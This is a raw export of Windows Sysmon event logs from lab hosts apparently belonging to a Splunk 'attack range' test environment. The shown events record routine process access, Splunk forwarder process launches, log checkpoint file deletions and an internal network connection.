10341000x800000000000000044559Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:51.623{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044558Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:51.623{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044557Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:51.623{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044556Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:51.623{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044555Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:51.623{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044554Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:51.623{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044553Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:51.623{0A5DF930-E35B-6299-0500-000000006002}412528C:\Windows\system32\csrss.exe{0A5DF930-1887-629A-2707-000000006002}1132C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044552Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:51.623{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-1887-629A-2707-000000006002}1132C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044551Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:51.624{0A5DF930-1887-629A-2707-000000006002}1132C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044550Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:51.514{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDEF14CEC7A06D2BD9C94FF66B4B5C85,SHA256=0A7829F2665245306140094E5186987819CDA1E65982CBEB358EAAC4BEDFA991,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205612Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:49.830{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56396-false10.0.1.12-8000- 23542300x8000000000000000205611Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:51.486{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAE4FDCE4D296D00D072355AEC18F39E,SHA256=9D30CF856B5A7C8534CB25D0F37673F5775497390DD59AA74C161503F520BEA6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044549Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:51.342{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9D753E90327A96F07F9A2029B4708ED1,SHA256=72B8B9149407FAAC7C17A5399F4668CAB675D8DE23029B32C31347A40D2B6E9D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044548Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:51.108{0A5DF930-1886-629A-2607-000000006002}30362356C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044578Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:52.623{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-1888-629A-2807-000000006002}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044577Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:52.623{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044576Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:52.623{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044575Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:52.623{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044574Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:52.623{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044573Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:52.623{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044572Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:52.623{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044571Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:52.623{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044570Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:52.623{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044569Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:52.623{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044568Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:52.623{0A5DF930-E35B-6299-0500-000000006002}412528C:\Windows\system32\csrss.exe{0A5DF930-1888-629A-2807-000000006002}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044567Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:52.623{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-1888-629A-2807-000000006002}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044566Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:52.624{0A5DF930-1888-629A-2807-000000006002}3304C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044565Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:52.608{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3164337FEC3C655A4697CC01EDEBBAA4,SHA256=F354223955B8858A0E2D625B8971D09C9C9B2C17A62D66D76AC7CED8B781D32E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205613Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:52.519{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40F77F349F68676C713DB9E7B984C9F4,SHA256=2726307BEA64A4201FFAF212B49A1D74B24CCF35721D3DBFF0750A6E99148DDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044579Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:53.702{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23375CDC8127C275010E30C9628CB34C,SHA256=A43BA498A1D21B1E0F627857D2B4B6C028DEA1930EAA354E1BA4FD528778DDAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205614Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 